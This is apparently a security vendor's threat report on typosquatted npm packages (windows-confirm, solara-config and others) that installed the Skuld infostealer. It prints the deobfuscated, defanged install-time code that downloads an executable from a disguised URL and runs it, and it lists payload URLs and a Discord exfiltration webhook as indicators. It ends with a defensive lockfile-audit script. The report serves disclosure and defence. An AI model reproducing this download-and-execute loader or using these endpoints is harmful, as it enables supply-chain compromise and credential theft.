Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. The threat actor, identified as “k303903” on the npm registry, disguised malicious packages — windows-confirm, windows-version-check, downloadsolara, and solara-config — as legitimate tools. Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction.
The npm registry’s swift response helped limit the spread and impact of this malicious campaign. However, the persistent nature of such attacks and the reuse of open source malware like the Skuld infostealer highlight that this issue is far from disappearing. By studying these recent incidents, developers and organizations can strengthen their defenses, safeguard credentials, and adopt more vigilant development practices.
Skuld Infostealer Returns to Poison the npm Well
This latest malicious campaign delivering the Skuld infostealer marks the second time in two months that this malware has targeted npm developers. It closely mirrors a previous attack reported by Socket on November 8, 2024, where Roblox developers were compromised via npm packages infected with Skuld and Blank Grabber malware. Further supporting this, Datadog Security Labs published research on November 22, 2024, that reinforced the scale and sophistication of the threat. In December 2024, the attack resurfaced, with a threat actor using typosquatting and simple yet effective techniques to compromise development machines and exfiltrate sensitive data.
The return of the Skuld infostealer to npm highlights a recurring pattern: attackers gain a foothold, achieve brief success, and swiftly adapt by reintroducing the threat with new packaging and distribution strategies. The December 2024 campaign exhibits the same familiar hallmarks: obfuscation, typosquatting, deceptive tactics, reliance on commodity malware, and common deployment methods.
Screenshot showcasing Skuld’s ability to steal passwords, cookies, sensitive files, and browsing history from Chromium and Gecko-based browsers.
Malicious Code
The following malicious code snippet, deobfuscated, defanged, and annotated with comments, offers insight into the threat actor’s methods.
const fs = require("fs-extra");
const path = require("path");
const fetch = require("node-fetch");
const { exec } = require("child_process");

const exeFilePath = path.join(__dirname, "download.exe");

// Downloads and writes the malicious binary to disk, then executes it.
async function downloadFile(url, dest) {
  const response = await fetch(url);
  if (!response.ok) {
    throw new Error("HTTP error! status: " + response.status);
  }
  const buffer = await response.buffer();
  await fs.writeFile(dest, buffer);
}

async function runExecutable() {
  try {
    // The URL is disguised to appear legitimate, using a Cloudflare-like domain.
    await downloadFile("hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page", exeFilePath);
    exec(exeFilePath, (error) => {
      if (error) {
        console.error("Error running the executable: " + error);
      }
    });
  } catch (err) {
    console.error("Download error: " + err);
  }
}

runExecutable();
The threat actor employed Obfuscator.io, a widely used open source tool, to obfuscate the package code and evade initial detection. The Skuld infostealer payload was hosted on URLs designed to appear legitimate, including a domain impersonating Cloudflare. Upon installation, the malicious package silently fetched and executed the malware under the filename download.exe (SHA256: 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07).
Socket AI Scanner’s analysis, including contextual details about the malicious package.
Threat Actor’s Strategy
The threat actor k303903 employed typosquatting by uploading npm packages that mimicked well-known productivity and web development libraries, including masquerading as Windows-related utilities and Solara — a Python framework for building interactive web applications. By publishing packages that appeared legitimate or closely related to these tools, the threat actor aimed to deceive developers into installing them without thoroughly inspecting the package code.
For data exfiltration, the threat actor used a Discord webhook (hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw), enabling data transfers and establishing command and control (C2) operations. The use of widely available, open source tools and services kept operational costs low while maximizing the campaign’s reach. To further deceive developers, the threat actor used legitimate-looking commands and paths to fetch the executable payload from a seemingly trustworthy source and from the legitimate service replit.dev. Although trivial to set up, Discord webhooks are a very common method for data exfiltration, allowing threat actors to blend into legitimate developer communication channels and testing environments.
The threat actor passing off their malicious package as a legitimate library to deceive users.
Impact Assessment
The malicious packages were downloaded more than 600 times before they were removed. Although the npm registry responded quickly — taking down the initial test package aaaa89852889 within one day and the subsequent, above-mentioned packages within four to five days — the impact on affected users was significant. Credentials, tokens, and other sensitive data were likely stolen, jeopardizing both individual developers and organizational networks. Short-lived campaigns like this can have long-lasting consequences, as compromised credentials may be weaponized well after the malicious packages are removed.
This attack mirrors the November 2024 incident, highlighting a troubling pattern: threat actors are pivoting rapidly, reusing known malware strains, and refining their deception techniques. The continued use of the Skuld infostealer demonstrates how commodity malware can cause devastating damage when distributed through trusted supply chains.
Recommendations and Mitigations
Securing your development environment requires a layered approach. While basic measures like verifying package authorship and relying on trusted repositories are important, using automation and specialized tools is essential to keep up with rapidly evolving threats. Deploying free and real-time supply chain security tools, such as Socket’s free GitHub app, CLI, and browser extension, can intercept malicious code early in the development lifecycle. These tools scan pull requests and installations to block harmful dependencies before they integrate into your environment.
Indicators of Compromise (IOCs):
Malicious Packages:
- windows-confirm
- windows-version-check
- downloadsolara
- solara-config
- aaaa89852889
Malicious URLs:
- hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page
- hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/page
- hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/start
Discord Webhook:
- hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw
SHA256 Hashes:
- 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07
MITRE ATT&CK:
- T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain
- T1059.007 – Command and Scripting Interpreter: JavaScript
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1027.013 – Obfuscated Files or Information: Encrypted/Encoded File
- T1546.016 – Event Triggered Execution: Installer Packages
- T1555.003 – Credentials from Password Stores: Credentials from Web Browsers
- T1552.001 – Unsecured Credentials: Credentials In Files
- T1567.004 – Exfiltration Over Web Service: Exfiltration Over Webhook
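To check whether a project ever resolved one of the packages in the Malicious Packages list above, including as a transitive dependency, the lockfile can be audited directly. The following is an added example, not Socket's tooling or code from the original report; the function names, the sample lockfile and its version numbers are assumptions made for illustration.

```javascript
const fs = require("fs");
// Package names copied from the IOC list in this report.
const IOC_PACKAGES = new Set([
  "windows-confirm", "windows-version-check", "downloadsolara",
  "solara-config", "aaaa89852889",
]);

// lockfileVersion 2/3: flat "packages" map keyed by install path, e.g.
// "node_modules/a/node_modules/b". The name is whatever follows the last
// "node_modules/", which keeps scoped names ("@scope/pkg") intact.
function fromPackagesMap(packages) {
  const hits = [];
  for (const [installPath, meta] of Object.entries(packages)) {
    const idx = installPath.lastIndexOf("node_modules/");
    if (idx === -1) continue; // "" is the root project, not a dependency
    const name = installPath.slice(idx + "node_modules/".length);
    if (IOC_PACKAGES.has(name)) hits.push({ name, version: meta.version, installPath });
  }
  return hits;
}

// lockfileVersion 1: nested "dependencies" tree, walked recursively.
function fromDependencyTree(deps, trail = []) {
  const hits = [];
  for (const [name, meta] of Object.entries(deps || {})) {
    const chain = [...trail, name];
    if (IOC_PACKAGES.has(name)) hits.push({ name, version: meta.version, installPath: chain.join(" > ") });
    hits.push(...fromDependencyTree(meta.dependencies, chain));
  }
  return hits;
}

function auditLockfile(lock) {
  return lock.packages ? fromPackagesMap(lock.packages) : fromDependencyTree(lock.dependencies);
}

// Constructed sample lockfile: "demo-app", "some-tool" and all versions are made up.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/some-tool": { version: "2.1.0" },
    "node_modules/some-tool/node_modules/solara-config": { version: "0.0.1" },
  },
};

// Usage: node audit-lock.js [path/to/package-lock.json]
const lock = process.argv[2] ? JSON.parse(fs.readFileSync(process.argv[2], "utf8")) : SAMPLE_LOCK;
console.log(auditLockfile(lock));
```

A hit means the package was resolved at some point, so the machine that ran the install should be treated as exposed and its stored credentials rotated, even though the packages are no longer on the registry.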